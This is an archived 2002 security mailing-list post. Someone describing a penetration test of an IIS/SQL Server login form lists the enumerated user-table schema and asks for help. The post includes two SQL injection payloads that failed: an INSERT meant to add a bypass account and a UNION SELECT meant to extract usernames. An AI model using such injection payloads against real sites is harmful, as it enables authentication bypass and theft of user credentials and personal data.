Hi all, I am currently performing a pen test against a web server using IIS with SQL integration. There is a user name and password form which I want to bypass and enumerate existing usernames and passwords. I have discovered the following columns/table data tblusers.ID uniqueidentifier tblusers.createdtimestamp smalldatetime tblusers.sessionID nvarchar tblUsers.LastUpdated smalldatetime tblUsers.LastUpdatedIP nvarchar tblUsers.LastUpdatedBy uniqueidentifier tblUsers.CompanyType nvarchar tblUsers.CompanyID uniqueidentifier tblUsers.Password nvarchar tblUsers.UserName nvarchar tblUsers.Title nvarchar tblUsers.Surname nvarchar tblUsers.Forename nvarchar tblUsers.AddressTo nvarchar tblUsers.Appointment nvarchar tblUsers.DirectPhone nvarchar tblUsers.Mobile nvarchar tblUsers.DirectEmail nvarchar tblUsers.DirectFax nvarchar tblUsers.Signature The text, ntext, and image data types are invalid in this subquery or aggregate expression. tblUsers.Address1 nvarchar tblUsers.Address2 nvarchar tblUsers.Address3 nvarchar tblUsers.Address4 nvarchar tblUsers.Address5 nvarchar tblUsers.PostCode nvarchar tblUsers.HomePhone nvarchar tblUsers.UserAccess bit I want to update the table to bypass the auth screen I have tried ------------- www.target.comUserName='insert into tblusers(createdtimestamp,sessionID,LastUpdated,LastUpdatedIP,LastUpdatedBy, CompanyType,CompanyID,Password,username,title,surname,forename,AddressTo,App ointment,DirectPhone,Mobile,DirectEmail,directfax,signature,address1,address 2,postcode,Homephone,UserAccess) values ('Oct 31 2000 8:52PM','7654','Oct 31 2000 8:52PM','127.0.0.1','','securitycompany','','test','test','mr','oleary','gar y','addrto','appointment','01131234567','07796698919','garyo@sec-1.com',0113 1234567','sig','123','456','ls287sr','01132297541',1)-- ------------ But had no joy In an attempt to gain access to data held with the username and password fields I have tried www.target.com/UserName='Union select 1,1,1,1,1,1,1,1,min(UserName) from tblusers where username >'a'--&password=hacker but get "Operand type clash: uniqueidentifier is incompatible with int" Any help would be greatly appreciated ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Thu May 09 2002 - 14:12:06 PDT